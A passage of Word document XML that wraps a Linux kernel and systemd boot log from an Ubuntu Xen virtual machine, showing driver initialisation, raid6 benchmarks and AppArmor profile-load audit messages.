    <w:p w14:paraId="1361478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[955698287.0] pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16023EF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[965760966.0] PCI: CLS 0 bytes, default 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F366EA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[965826364.0] Unpacking initramfs...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640169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[1251931051.1] Freeing initrd memory: 19484K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AEBC7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[1256370252.1] Scanning for low memory corruption every 60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51815B3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[1261529945.1] Initialise system trusted keyrings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A94AD4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lastRenderedPageBreak/>
        <w:t>[1265242812.1] Key type blacklist registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C8A9B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[1270703630.1] workingset: timestamp_bits=36 max_order=18 bucket_order=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124271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[1278759071.1] zbud: loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FCE4D0"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[1282878516.1] squashfs: version 4.0 (2009/01/31) Phillip Lougher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2EDA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[1289539736.1] fuse init (API version 7.26)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC33EA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[1295108453.1] Key type asymmetric registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346C46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[1298571769.1] Asymmetric key parser 'x509' registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEAD2A0"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[1302435161.1] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 247)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F518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[1308347952.1] io scheduler noop registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607058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[1311560798.1] io scheduler deadline registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266AE37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[1314961112.1] io scheduler cfq registered (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4BED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[1318964495.1] intel_idle: Please enable MWAIT in BIOS SETUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6439446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[1319064795.1] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0402BDA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[1324979857.1] ACPI: Power Button [PWRF]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833528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[1328381431.1] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F256E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[1334783883.1] ACPI: Sleep Button [SLPF]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD46A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[1338657919.1] xen: --&gt; pirq=22 -&gt; irq=28 (gsi=28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298CEB0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[1338772212.1] xen:grant_table: Grant tables using version 1 layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2174B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[1343758938.1] Grant table initialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488408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[1347166831.1] Cannot get hvm parameter CONSOLE_EVTCHN (18): -22!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20CBB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[1351528333.1] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573426A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[1388458801.1] 00:06: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC12E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[1396306426.1] Linux agpgart interface v0.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E559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[1402652628.1] loop: module loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496D06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[1406942041.1] Invalid max_queues (4), will use default max: 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C703E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[1413146002.1] ata_piix 0000:00:01.1: version 2.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE472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[1414367912.1] scsi host0: ata_piix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712C9BE0"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[1417942126.1] scsi host1: ata_piix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764D21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[1421407329.1] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD988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[1427375516.1] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D320FE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[1435175394.1] libphy: Fixed MDIO Bus: probed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44999B2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[1439163785.1] tun: Universal TUN/TAP device driver, 1.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E175B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[1443671722.1] PPP generic driver version 2.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DCBD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[1449954098.1] xen_netfront: Initialising Xen virtual ethernet driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E30DEB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[1457572685.1] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC67B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[1473237021.1] ehci-pci: EHCI PCI platform driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3982FC5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[1477331938.1] ehci-platform: EHCI generic platform driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711880C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[1481865344.1] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411624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[1487124516.1] ohci-pci: OHCI PCI platform driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F528A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[1491288855.1] ohci-platform: OHCI generic platform driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D261C4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[1496019580.1] uhci_hcd: USB Universal Host Controller Interface driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16FEA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[1501787328.1] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F33E4A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[1512138293.1] serio: i8042 KBD port at 0x60,0x64 irq 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D76C9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[1517061669.1] serio: i8042 AUX port at 0x60,0x64 irq 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D2D0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[1521867400.1] mousedev: PS/2 mouse device common for all mice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02662A10"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lastRenderedPageBreak/>
        <w:t>[1528305597.1] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24684F3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[1536216041.1] rtc_cmos 00:02: rtc core: registered rtc_cmos as rtc0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B42C6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[1541608368.1] rtc_cmos 00:02: alarms up to one day, 114 bytes nvram, hpet irqs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B175A9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[1549307710.1] device-mapper: uevent: version 1.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FADBB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[1558880159.1] device-mapper: ioctl: 4.37.0-ioctl (2017-09-20) initialised: dm-devel@redhat.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB262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[1565660037.1] NET: Registered protocol family 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7782EAD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[1573786413.1] blkfront: xvda: barrier or flush: disabled; persistent grants: disabled; indirect descriptors: enabled;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74777FE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[1582735856.1] Segment Routing with IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771FC3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[1586085339.1] NET: Registered protocol family 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE567E0"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[1589697824.1] Key type dns_resolver registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEE86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[1595366946.1] intel_rdt: Intel RDT L3 allocation detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B74E3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[1601257953.1] RAS: Correctable Errors collector initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1440DC7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[1606481120.1] sched_clock: Marking stable (1606281847, 0)-&gt;(10112567157, -8506285310)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175783F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[1612342540.1] registered taskstats version 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DC14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[1615606009.1]  xvda: xvda1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C2C2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[1618389864.1] Loading compiled-in X.509 certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2658092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[1624882494.1] Loaded X.509 cert 'Build time autogenerated kernel key: 1472665054521b238871beb9554d15504325c156'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A63DD3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[1632653831.1] zswap: loaded using pool lzo/zbud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B05E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[1639087595.1] Key type big_key registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018DAD0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[1642294522.1] Key type trusted registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334D8E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[1647154794.1] Key type encrypted registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D715E6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[1650919509.1] AppArmor: AppArmor sha1 policy hashing enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F3D8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[1655497188.1] ima: No TPM chip found, activating TPM-bypass! (rc=-19)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0228CE7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[1660714633.1] ima: Allocated hash algorithm: sha1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72852F4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[1664278207.1] evm: HMAC attrs: 0x1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A73894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[1667608602.1]   Magic number: 14:400:77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66CC3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[1671075735.1] rtc_cmos 00:02: setting system clock to 2018-12-21 12:04:40 UTC (1545393880)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB4A52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[1677355139.1] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C30C73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[1681780336.1] EDD information not available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656B6F0"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[1687733151.1] Freeing unused kernel memory: 2372K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4CCA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[1696070973.1] Write protecting the kernel read-only data: 18432k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B4C9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[1701254154.1] Freeing unused kernel memory: 2008K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7855888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[1705743711.1] Freeing unused kernel memory: 188K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046491D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[1715477224.1] x86/mm: Checked W+X mappings: passed, no W+X pages found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213ADDD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[1721193335.1] x86/mm: Checking user space page tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E201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[1731102653.1] x86/mm: Checked W+X mappings: passed, no W+X pages found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3801935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[1751868658.1] random: udevadm: uninitialized urandom read (16 bytes read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DE53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[1757302492.1] random: systemd-udevd: uninitialized urandom read (16 bytes read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF57C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[1762931607.1] random: systemd-udevd: uninitialized urandom read (16 bytes read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C68581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[1945727269.1] AVX2 version of gcm_enc/dec engaged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A087DE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[1949613014.1] AES CTR mode by8 optimization enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2604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[2272165675.2] tsc: Refined TSC clocksource calibration: 2400.001 MHz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC381F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[2277150119.2] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x22983858435, max_idle_ns: 440795258295 ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665CDCC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lastRenderedPageBreak/>
        <w:t>[3660065068.3] raid6: sse2x1   gen()  9113 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138EC38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[3708065561.3] raid6: sse2x1   xor()  6397 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF772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[3756067802.3] raid6: sse2x2   gen() 10919 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA984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[3808061488.3] raid6: sse2x2   xor()  7010 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107029A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[3860065926.3] raid6: sse2x4   gen() 12602 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB4B1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[3912063347.3] raid6: sse2x4   xor()  8000 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D174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[3964064174.3] raid6: avx2x1   gen() 15380 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F41CF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[4016062541.4] raid6: avx2x1   xor() 12087 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0940A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[4068062848.4] raid6: avx2x2   gen() 20769 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2702DED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[4120063141.4] raid6: avx2x2   xor() 12674 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B246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[4172062033.4] raid6: avx2x4   gen() 23766 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620AF3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[4220061121.4] raid6: avx2x4   xor() 14645 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF312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[4224268335.4] raid6: using algorithm avx2x4 gen() 23766 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E041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[4229047220.4] raid6: .... xor() 14645 MB/s, rmw enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F5BB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[4233500421.4] raid6: using avx2x2 recovery algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE5D4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[4239865431.4] xor: automatically using best checksumming function   avx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ACAED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[4247550014.4] async_tx: api initialized (async)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BBCC8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[4318120055.4] Btrfs loaded, crc32c=crc32c-intel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2959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[4353096368.4] EXT4-fs (xvda1): mounted filesystem with ordered data mode. Opts: (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115171F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[4517023086.4] ip_tables: (C) 2000-2006 Netfilter Core Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8DB58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[4528241306.4] systemd[1]: systemd 237 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379904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[4552411301.4] systemd[1]: Detected virtualization xen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0A91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[4559563819.4] systemd[1]: Detected architecture x86-64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3382D0A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[4574473157.4] systemd[1]: Set hostname to &lt;ubuntu&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8AC06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[4583794096.4] systemd[1]: Initializing machine ID from random generator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3204ECD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[4590444341.4] systemd[1]: Installed transient /etc/machine-id file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FDD1E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[4750864284.4] systemd[1]: Created slice User and Session Slice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0169C1A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[4760750738.4] systemd[1]: Created slice System Slice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513671B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[4769034200.4] systemd[1]: Listening on Journal Audit Socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B47E3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[4778512441.4] systemd[1]: Created slice system-serial\x2dgetty.slice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175AF8C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[4874400462.4] Loading iSCSI transport class v2.0-870.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807646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[4904053086.4] iscsi: registered transport (tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA3A96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[4940496394.4] EXT4-fs (xvda1): re-mounted. Opts: discard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A669B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[5106934367.5] systemd-journald[393]: Received request to flush runtime journal from PID 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6631C1F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[5121476059.5] iscsi: registered transport (iser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEB9EB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[6501940919.6] audit: type=1400 audit(1545393885.328:2): apparmor="STATUS" operation="profile_load" profile="unconfined" name="lxc-container-default" pid=464 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335895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[6502505558.6] audit: type=1400 audit(1545393885.328:3): apparmor="STATUS" operation="profile_load" profile="unconfined" name="lxc-container-default-cgns" pid=464 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E359F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[6504509960.6] audit: type=1400 audit(1545393885.332:4): apparmor="STATUS" operation="profile_load" profile="unconfined" name="lxc-container-default-with-mounting" pid=464 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE9CB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[6505058227.6] audit: type=1400 audit(1545393885.332:5): apparmor="STATUS" operation="profile_load" profile="unconfined" name="lxc-container-default-with-nesting" pid=464 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCEDF5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lastRenderedPageBreak/>
        <w:t>[7032124407.7] audit: type=1400 audit(1545393885.860:6): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/sbin/dhclient" pid=482 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245BC62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[7032718031.7] audit: type=1400 audit(1545393885.860:7): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/lib/NetworkManager/nm-dhcp-client.action" pid=482 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCEB2E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[7033191452.7] audit: type=1400 audit(1545393885.860:8): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/lib/NetworkManager/nm-dhcp-helper" pid=482 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B2C3E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[7034851907.7] audit: type=1400 audit(1545393885.860:9): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/lib/connman/scripts/dhclient-script" pid=482 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012495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[7051552932.7] audit: type=1400 audit(1545393885.876:10): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/bin/lxc-start" pid=517 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895437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[7199498724.7] audit: type=1400 audit(1545393886.024:11): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/bin/man" pid=519 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149D51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[11161377278.11] new mount options do not match the existing superblock, will be ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487FC6C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[12363474839.12] random: crng init done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA168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[12363476830.12] random: 7 urandom warning(s) missed due to ratelimiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E855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[16900680066.16] kauditd_printk_skb: 5 callbacks suppressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428E4E1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[16900681473.16] audit: type=1400 audit(1545393895.728:17): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap-update-ns.core" pid=961 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6855DED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[16971224711.16] audit: type=1400 audit(1545393895.796:18): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.core.hook.configure" pid=963 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41535AF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[19172179813.19] audit: type=1400 audit(1545393898.000:19): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/snap/core/5328/usr/lib/snapd/snap-confine" pid=1033 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6772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[19172634993.19] audit: type=1400 audit(1545393898.000:20): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/snap/core/5328/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" pid=1033 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA6B5F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[19190877440.19] audit: type=1400 audit(1545393898.016:21): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap-update-ns.core" pid=1038 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399F9C8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[19255303345.19] audit: type=1400 audit(1545393898.080:22): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.core.hook.configure" pid=1040 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B457C3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[20044096523.20] audit: type=1400 audit(1545393898.868:23): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap-update-ns.amazon-ssm-agent" pid=1115 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BAAC7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[20048992141.20] audit: type=1400 audit(1545393898.876:24): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.amazon-ssm-agent.amazon-ssm-agent" pid=1117 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76EEF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[20053640745.20] audit: type=1400 audit(1545393898.880:25): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.amazon-ssm-agent.ssm-cli" pid=1119 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBACB00"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[343815640354.343] systemd: 36 output lines suppressed due to ratelimiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250ACB9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[343819811212.343] systemd[1]: systemd 237 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A304A3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[343819860527.343] systemd[1]: Detected virtualization xen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C50A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[343819868348.343] systemd[1]: Detected architecture x86-64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCF491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[344163440924.344] systemd[1]: Stopping Journal Service...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5733240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[344166748005.344] systemd-journald[393]: Received SIGTERM from PID 1 (systemd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFA47B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[344191632037.344] systemd[1]: Stopped Journal Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9DCDD0"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[344193359863.344] systemd[1]: Starting Journal Service...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED5CF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lastRenderedPageBreak/>
        <w:t>[344209913346.344] systemd[1]: Started Journal Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441500C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[388149683405.388] audit: type=1400 audit(1545394267.287:26): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/bin/man" pid=9951 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB5B8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[388150220347.388] audit: type=1400 audit(1545394267.287:27): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="man_filter" pid=9951 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882712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[388150640322.388] audit: type=1400 audit(1545394267.287:28): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="man_groff" pid=9951 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3CBB5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[388935289550.388] SGI XFS with ACLs, security attributes, realtime, no debug enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECCDD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[394016817570.394] audit: type=1400 audit(1545394273.155:29): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="lxc-container-default" pid=10795 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A11F5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[394017449828.394] audit: type=1400 audit(1545394273.155:30): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="lxc-container-default-cgns" pid=10795 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C714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[394017954690.394] audit: type=1400 audit(1545394273.155:31): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="lxc-container-default-with-mounting" pid=10795 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD353E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[394018487638.394] audit: type=1400 audit(1545394273.155:32): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="lxc-container-default-with-nesting" pid=10795 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65461F2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[394184258557.394] audit: type=1400 audit(1545394273.323:33): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/sbin/dhclient" pid=10797 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26066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[394184852626.394] audit: type=1400 audit(1545394273.323:34): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/lib/NetworkManager/nm-dhcp-client.action" pid=10797 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D0016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[394185330873.394] audit: type=1400 audit(1545394273.323:35): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/lib/NetworkManager/nm-dhcp-helper" pid=10797 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD25C1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[394185765851.394] audit: type=1400 audit(1545394273.323:36): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/lib/connman/scripts/dhclient-script" pid=10797 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2343A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[394196588105.394] audit: type=1400 audit(1545394273.335:37): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/bin/lxc-start" pid=10799 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E850F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[394269978275.394] audit: type=1400 audit(1545394273.407:38): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/bin/man" pid=10801 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C75E22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[432983200194.432] kauditd_printk_skb: 12 callbacks suppressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1171B94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[432983201820.432] audit: type=1400 audit(1545394312.118:51): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="lxc-container-default" pid=12672 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DD9AB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[432985982514.432] audit: type=1400 audit(1545394312.122:52): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="lxc-container-default-cgns" pid=12672 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85CBC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[432986465264.432] audit: type=1400 audit(1545394312.122:53): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="lxc-container-default-with-mounting" pid=12672 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E774F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[432986978760.432] audit: type=1400 audit(1545394312.122:54): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="lxc-container-default-with-nesting" pid=12672 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7E581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[433153679997.433] audit: type=1400 audit(1545394312.286:55): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/sbin/dhclient" pid=12675 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
